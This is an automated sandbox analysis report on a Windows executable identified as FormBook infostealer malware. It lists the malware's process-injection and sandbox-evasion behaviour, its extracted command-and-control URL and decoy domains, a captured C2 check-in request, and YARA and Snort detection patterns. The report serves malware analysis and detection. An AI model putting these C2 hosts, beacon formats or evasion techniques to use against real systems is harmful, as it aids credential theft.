Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ClbrTLBbVA.exe

Overview

General Information

Sample Name:ClbrTLBbVA.exe
Original Sample Name:441aa97af8ab929af47af76962584b02.exe
Analysis ID:838418
MD5:441aa97af8ab929af47af76962584b02
SHA1:19179b5b35112d35d1b3514f1026663efb86ef37
SHA256:1c4a23543bd6562ebedfbc5905ff87a87d06d25a03b1015043314e00befa54dd
Tags:32exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • ClbrTLBbVA.exe (PID: 5252 cmdline: C:\Users\user\Desktop\ClbrTLBbVA.exe MD5: 441AA97AF8AB929AF47AF76962584B02)
    • ClbrTLBbVA.exe (PID: 868 cmdline: {path} MD5: 441AA97AF8AB929AF47AF76962584B02)
    • ClbrTLBbVA.exe (PID: 7108 cmdline: {path} MD5: 441AA97AF8AB929AF47AF76962584B02)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 4764 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 5020 cmdline: /c del "C:\Users\user\Desktop\ClbrTLBbVA.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.theredorchard.co.uk/ne28/"], "decoy": ["basic-careitem.net", "healstockton.com", "groupetalentapro.com", "geseconevent.com", "adornmentwithadrienne.com", "lazylynx.se", "forestwerx.com", "labishu.com", "hilykan.com", "beyondyoursenses.co.uk", "inno-imc.com", "driverrehab.online", "mantlepies.co.uk", "sicepat.net", "kiwitownkids.com", "infiniumsource.com", "motorsolutionswithmakro.co.uk", "6pg.shop", "zijlont.xyz", "corpusskencar.com", "korthalsgriffonyorkshire.co.uk", "hatchandneststudio.com", "listestubenring.com", "mynarcissist.co.uk", "hfe2wr8zdi1.cfd", "crackthecombination.com", "cycw168.com", "fren.pet", "medicalcannabis.me.uk", "locallooknh.com", "dairecheese.com", "celebrate.rsvp", "foody-people.uk", "11600yy.com", "tuberider.africa", "iamjlfreak.com", "breadpartner.com", "larrgestrreet.site", "savethedateevents.uk", "dongyoufood.com", "jdmgarage.shop", "commonthreadpatterns.com", "ogadriver.africa", "digitalfreakk.com", "poshcompanyandsuites.net", "gogh.live", "easymediarealestate.com", "brandpage.site", "johnhallerconstruction.com", "finemarken.com", "dxyzcmag2020.com", "greengrovetherapy.com", "freshfruits.online", "globalventureproject.info", "themanxlobster.co.uk", "conviord.com", "goodpeoplegb1115.shop", "christiesparis.com", "pnc-verify-support1.com", "cheerleader.social", "forum-sanmonika.online", "dulcescamus.com", "thegolfteeshop.co.uk", "dafabetvn.info"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Diceloader_15eeb7b9unknownunknown
      • 0x1f2e9:$a1: E9 92 9D FF FF C3 E8
      0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      11.2.ClbrTLBbVA.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        11.2.ClbrTLBbVA.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          11.2.ClbrTLBbVA.exe.400000.0.unpackWindows_Trojan_Diceloader_15eeb7b9unknownunknown
          • 0x1e4e9:$a1: E9 92 9D FF FF C3 E8
          11.2.ClbrTLBbVA.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          11.2.ClbrTLBbVA.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.315.197.142.17349699802031412 03/30/23-20:53:01.782313
          SID:2031412
          Source Port:49699
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.315.197.142.17349699802031453 03/30/23-20:53:01.782313
          SID:2031453
          Source Port:49699
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.315.197.142.17349699802031449 03/30/23-20:53:01.782313
          SID:2031449
          Source Port:49699
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: ClbrTLBbVA.exeReversingLabs: Detection: 32%
          Source: ClbrTLBbVA.exeVirustotal: Detection: 47%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Machine Learning detection for sample
          Source: ClbrTLBbVA.exeJoe Sandbox ML: detected
          Source: 11.2.ClbrTLBbVA.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.theredorchard.co.uk/ne28/"], "decoy": ["basic-careitem.net", "healstockton.com", "groupetalentapro.com", "geseconevent.com", "adornmentwithadrienne.com", "lazylynx.se", "forestwerx.com", "labishu.com", "hilykan.com", "beyondyoursenses.co.uk", "inno-imc.com", "driverrehab.online", "mantlepies.co.uk", "sicepat.net", "kiwitownkids.com", "infiniumsource.com", "motorsolutionswithmakro.co.uk", "6pg.shop", "zijlont.xyz", "corpusskencar.com", "korthalsgriffonyorkshire.co.uk", "hatchandneststudio.com", "listestubenring.com", "mynarcissist.co.uk", "hfe2wr8zdi1.cfd", "crackthecombination.com", "cycw168.com", "fren.pet", "medicalcannabis.me.uk", "locallooknh.com", "dairecheese.com", "celebrate.rsvp", "foody-people.uk", "11600yy.com", "tuberider.africa", "iamjlfreak.com", "breadpartner.com", "larrgestrreet.site", "savethedateevents.uk", "dongyoufood.com", "jdmgarage.shop", "commonthreadpatterns.com", "ogadriver.africa", "digitalfreakk.com", "poshcompanyandsuites.net", "gogh.live", "easymediarealestate.com", "brandpage.site", "johnhallerconstruction.com", "finemarken.com", "dxyzcmag2020.com", "greengrovetherapy.com", "freshfruits.online", "globalventureproject.info", "themanxlobster.co.uk", "conviord.com", "goodpeoplegb1115.shop", "christiesparis.com", "pnc-verify-support1.com", "cheerleader.social", "forum-sanmonika.online", "dulcescamus.com", "thegolfteeshop.co.uk", "dafabetvn.info"]}
          Source: ClbrTLBbVA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: ClbrTLBbVA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: oGIG5Ul.pdbSHA256 source: ClbrTLBbVA.exe
          Source: Binary string: colorcpl.pdbGCTL source: ClbrTLBbVA.exe, 0000000B.00000002.345989479.0000000001660000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: ClbrTLBbVA.exe, 0000000B.00000002.345989479.0000000001660000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: oGIG5Ul.pdb source: ClbrTLBbVA.exe
          Source: Binary string: wntdll.pdbUGP source: ClbrTLBbVA.exe, 0000000B.00000003.291035034.000000000134B000.00000004.00000020.00020000.00000000.sdmp, ClbrTLBbVA.exe, 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.347680713.0000000000F2B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.0000000004640000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.000000000475F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.345656425.0000000000D86000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ClbrTLBbVA.exe, ClbrTLBbVA.exe, 0000000B.00000003.291035034.000000000134B000.00000004.00000020.00020000.00000000.sdmp, ClbrTLBbVA.exe, 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.347680713.0000000000F2B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.0000000004640000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.000000000475F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.345656425.0000000000D86000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 4x nop then pop esi11_2_004172E6
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 4x nop then pop esi11_2_0041731A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 4x nop then pop edi11_2_00416CE8

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.145 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.adornmentwithadrienne.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49699 -> 15.197.142.173:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49699 -> 15.197.142.173:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49699 -> 15.197.142.173:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.theredorchard.co.uk/ne28/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj HTTP/1.1Host: www.adornmentwithadrienne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 66.235.200.145 66.235.200.145
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.00000000026D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: ClbrTLBbVA.exeString found in binary or memory: http://tempuri.org/RentalPropertyDataSet.xsd
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.11600yy.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.11600yy.com/ne28/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.11600yy.com/ne28/www.greengrovetherapy.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.11600yy.comReferer:
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6pg.shop
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6pg.shop/ne28/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6pg.shop/ne28/www.labishu.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6pg.shopReferer:
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adornmentwithadrienne.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adornmentwithadrienne.com/ne28/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adornmentwithadrienne.com/ne28/www.dafabetvn.info
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adornmentwithadrienne.comReferer:
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.conviord.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.conviord.com/ne28/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.conviord.com/ne28/www.fren.pet
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.conviord.comReferer:
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dafabetvn.info
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dafabetvn.info/ne28/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dafabetvn.info/ne28/www.6pg.shop
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dafabetvn.infoReferer:
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.forum-sanmonika.online
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.forum-sanmonika.online/ne28/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.forum-sanmonika.online/ne28/www.11600yy.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.forum-sanmonika.onlineReferer:
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fren.pet
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fren.pet/ne28/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fren.pet/ne28/www.groupetalentapro.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fren.petReferer:
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.geseconevent.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.geseconevent.com/ne28/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.geseconevent.com/ne28/www.forum-sanmonika.online
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.geseconevent.comReferer:
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.greengrovetherapy.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.greengrovetherapy.com/ne28/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.greengrovetherapy.com/ne28/www.listestubenring.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.greengrovetherapy.comReferer:
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.groupetalentapro.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.groupetalentapro.com/ne28/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.groupetalentapro.com/ne28/www.poshcompanyandsuites.net
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.groupetalentapro.comReferer:
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hatchandneststudio.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hatchandneststudio.com/ne28/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hatchandneststudio.com/ne28/www.theredorchard.co.uk
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hatchandneststudio.comReferer:
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.labishu.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.labishu.com/ne28/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.labishu.com/ne28/www.geseconevent.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.labishu.comReferer:
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.listestubenring.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.listestubenring.com/ne28/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.listestubenring.com/ne28/www.conviord.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.listestubenring.comReferer:
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.poshcompanyandsuites.net
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.poshcompanyandsuites.net/ne28/
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.poshcompanyandsuites.net/ne28/www.hatchandneststudio.com
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.poshcompanyandsuites.netReferer:
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theredorchard.co.uk
          Source: explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theredorchard.co.uk/ne28/
